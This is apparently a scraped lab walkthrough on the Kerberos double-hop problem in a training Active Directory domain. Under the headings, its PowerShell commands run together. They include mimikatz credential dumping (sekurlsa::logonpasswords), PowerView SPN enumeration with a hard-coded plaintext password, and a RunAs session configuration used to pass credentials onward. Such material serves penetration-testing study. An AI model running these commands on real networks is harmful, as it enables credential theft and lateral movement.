21.Kerberos Double Hop Problem
Overview
Scenario
Steps to Reproduce
Enter-PSSession -ComputerName DEV01 -Credential INLANEFREIGHT\backupadmcd 'C:\Users\Public\'.\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exittasklist /V | findstr backupadmklistimport-module .\PowerView.ps1get-domainuser -spn$SecPassword = ConvertTo-SecureString '!qazXSW@' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\backupadm', $SecPassword)get-domainuser -spn -credential $Cred | select samaccountnameRegister-PSSessionConfiguration -Name backupadmsess -RunAsCredential INLANEFREIGHT\backupadmRestart-Service WinRMEnter-PSSession -ComputerName DEV01 -Credential INLANEFREIGHT\backupadm -ConfigurationName backupadmsess
Solution: CredSSP Authentication
Steps to Enable CredSSP
Alternative Solution: Kerberos Constrained Delegation (KCD)
Conclusion
Last updated